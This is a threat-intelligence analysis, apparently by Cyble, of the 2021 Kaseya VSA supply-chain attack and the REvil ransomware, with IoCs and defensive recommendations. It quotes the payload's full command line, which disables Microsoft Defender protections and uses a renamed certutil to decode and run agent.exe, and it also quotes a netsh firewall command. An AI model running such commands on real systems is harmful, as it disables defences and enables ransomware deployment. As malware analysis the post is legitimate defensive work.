Watch the video where we analyze the Kaseya VSA supply chain attack and dissect the REvil ransomware through Sandbox Execution.
Update on July 5, 2021:
The REvil Ransomware group posted a message on their leak site in the darkweb, claiming that they have compromised Kaseya, an MSP provider, on July 02, 2021. The Ransomware group also claims that there have been a million systems impacted by the ransomware at present. The group is demanding a 70Million USD in BTC for publicly publishing the decryptor for all victims.
Figure 1: REvil’s post
Kaseya, a complete IT solution management company, released a public media notice stating that their product VSA, dealing with remote monitoring & management, is under attack.
The public notice released on July 2, 2021, at 10:00 PM EST states:
- “All on-premises VSA servers should continue to remain down until further instructions from Kaseya about when it is safe to restore operations. A patch will be required to be installed prior to restarting the VSA.”
- “SaaS & hosted VSA servers will become operational once Kaseya has determined that we can safely restore operations.”
According to researchers, a massive supply chain attack executed by the REvil ransomware targeting “Kaseya VSA” has impacted several Managed Service Providers (MSP) and their clients. The ransomware was delivered after an apparent auto-update in the product. Kaseya’s remote IT management software administers systems with high privilege, which allows easy ransomware propagation across the client’s system.
The attack chain of the Kaseya VSA Ransomware attack is depicted in the following diagram.
Figure 2: Attack chain of Kaseya VSA Ransomware attack
Kaseya VSA is an automated software patch management and vulnerability management system. The ransomware group makes use of software updates through the Kaseya VSA agent hotfix and delivers the REvil encryptor payload to clients. The hotfix file called “agent.exe” has embedded malicious DLL file which is side-loaded into legitimate Microsoft Defender using defender executable named “MsMpEng.exe“.
The REvil (Ransomware Evil), also known as Sodinokibi, was formed in 2019 and operates as ransomware-as-a-service, i.e., it provides prebuild ransomware tools to its affiliates for executing attacks. The ransomware was first used by the GOLD SOUTHFIELD threat group. REvil is one of the most sophisticated Ransomware groups and is behind several significant attacks. Figure 3 shows the ransom note used by REvil.
Figure 3: Ransom note
Technical Analysis
The Cyble research team was able to discover recent REvil ransomware sample with SHA256:D55F983C994CAA160EC63A59F6B4250FE67FB3E8C43A388AEC60A4A6978E9F1E.
It was found that the main REvil sample is a dropper, and VC compiled binary with malicious resources named ”SOFTIS” and “MODLIS”.
As shown in Figure 4, it loads resources during runtime; the resource files are REvil payload “mpsvc.dll” and the loader “MsMpEng.exe“.
Figure 4: Dropper file
Upon execution, the dropper creates REvil payload files and the loader file in the following system directory.
C:\Windows\mpsvc.dll (which is sideloaded in legit Microsoft Defender)
C:\Windows\MsMpEng.exe (legit Loader files)
Figure 5 below shows dropped payloads on the victim’s machine and their execution.
Figure 5: Payload files
The dropper file and Ransomware payload have valid certificates and use the same certifier named PB03 TRANSPORT LTD, as depicted in the image below.
Figure 6 Certificate Information
The REvil ransomware payload has an embedded RC4 encrypted configuration file, and it is decrypted during the runtime, as shown in Figure 7.
Figure 7 Decrypted Configuration File of REvil
The REvil ransomware configuration is stored in JSON format with the configuration parameters shown below.
| Keys | Description |
| et | Encryption type |
| wipe | Erase directories |
| ext | Targeted file extension |
| dbg | Debugging flag |
| fld | Backup program directories |
| wfld | Whitelisted directories |
| prc | List of processes to terminate |
| dmn | C2 domains |
| svc | Services to be disabled |
| net | Encryption of network shared drives |
| exp | Exploiting privilege escalation |
| nname | File name of ransom notes (readme.txt) |
| nbody | Ransomware notes in Base64 |
The image below highlights the configuration file with C2 domains, Base64 decoded ransom note, and services stopped by the payload.
Figure 8 Configuration File in JSON Format
The command, netsh advfirewall firewall set rule group=”network discovery” new enable=yes, is used by REvil to change the firewall settings to allow local computers to be discovered on their network.
Figure 9 Enabling Network Discovery
This is followed by the creation of a registry key to store encryption keys of the attacker and the victim in addition to a generated unique file extension.
The registry key created in this case is: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\BlackLivesMatter
Figure 10 Registry key added by REvil
As shown below, the payload starts folder enumeration and loads the targeted file into the memory for encryption.
Figure 11 File System Enumeration
The payload then encrypts the plain text content and writes back the encrypted content in the file. The debugger image below showcases the encrypted file content. After encryption, the files are appended with a unique extension generated by the ransomware.
Figure 12 Encrypting Plain Text Content and Writing the Encrypted Content in the File
Finally, the ransomware locks the victim’s screen and displays the ransom note. Figure 13 shows the locks screen with encrypted files. The ransomware does not require an active internet connection for performing encryption and generates a unique key for every infected system.
Figure 13: Lock screen with Encrypted files
Moreover, REvil has functionalities to disable Microsoft Defender services, such as DisableRealtimeMonitoring, DisableIntrusionPreventionSystem, DisableIOAVProtection, and DisableScriptScanning. The payload tries to execute a PowerShell command to disrupt the Microsoft Defender services, as shown below.
“C:\WINDOWS\system32\cmd.exe” /c ping 127.0.0.1 -n 4979 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe
The ransom note consists of a link, which can only be accessed using the keys present in the ransom note. The link belongs to the REvil (Sodinokibi), and it has information related to the ransom amount, the decryptor, and a timer.
Figure 14 showcases the website of the ransomware group present in the ransom note.
Figure 14: REvil’s Ransomware group website
Figure 15 shows the attack heat map for the REvil ransomware group. As of July 8, 2021, there have been 140 victims of the REvil ransomware.
Figure 15: REvil’s Attack Heat Map
Figure 16 depicts the industry-wise attack distribution of the REvil ransomware victims observed by the Cyble Research team.
Figure 16: REvil’s Industry-wise Attack Distribution.
REvil is one of the most active ransomware groups, targeting multiple victims on a regular basis. As per our research, the activities of the REvil ransomware group may be targeted towards a massive supply chain attack.
Cyber espionage activities are evolving quickly, and we have seen supply chain attacks in the past as well, which have impacted large organizations. Attackers will continue to find new attack vectors to remain evasive, so it becomes essential for organizations to harden their security.
Our Recommendations
- Use the shared IoCs to monitor and block the malware infection.
- Use strong passwords and enforce multi-factor authentication wherever possible.
- Conduct regular & timely patching of vulnerabilities on your infrastructure.
- Use a reputed anti-virus and Internet security software package on your connected devices, including PC, laptop, and mobile.
- Refrain from opening untrusted links and email attachments without verifying their authenticity.
- Conduct regular backup practices and keep those backups offline or in a separate network.
Indicators of Compromise (IoCs):
| Indicators | Indicator type | Description |
| 8dd620d9aeb35960bb766458c8890ede987c33d239cf730f93fe49d90ae759dd | SHA-256 | mpsvc.dll |
| e2a24ab94f865caeacdf2c3ad015f31f23008ac6db8312c2cbfb32e4a5466ea2 | SHA-256 | DLL file |
| d55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e | SHA-256 | sample.exe |
| 9b46d03b690bda0df57c0ebb8dae0aebdd1d131beb500242fa8fe59cb260eed1 | SHA-256 | file.exe |
| hxxp[:]//aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd[.]onion | URL | Tor link |
About Cyble:
Cyble is a global threat intelligence SaaS provider that helps enterprises protect themselves from cybercrimes and exposure in the darkweb. Cyble’s prime focus is to provide organizations with real-time visibility into their digital risk footprint. Backed by Y Combinator as part of the 2021 winter cohort, Cyble has also been recognized by Forbes as one of the top 20 Best Cybersecurity Startups to Watch In 2020. Headquartered in Alpharetta, Georgia, and with offices in Australia, Singapore, and India, Cyble has a global presence. To learn more about Cyble, visit www.cyble.com.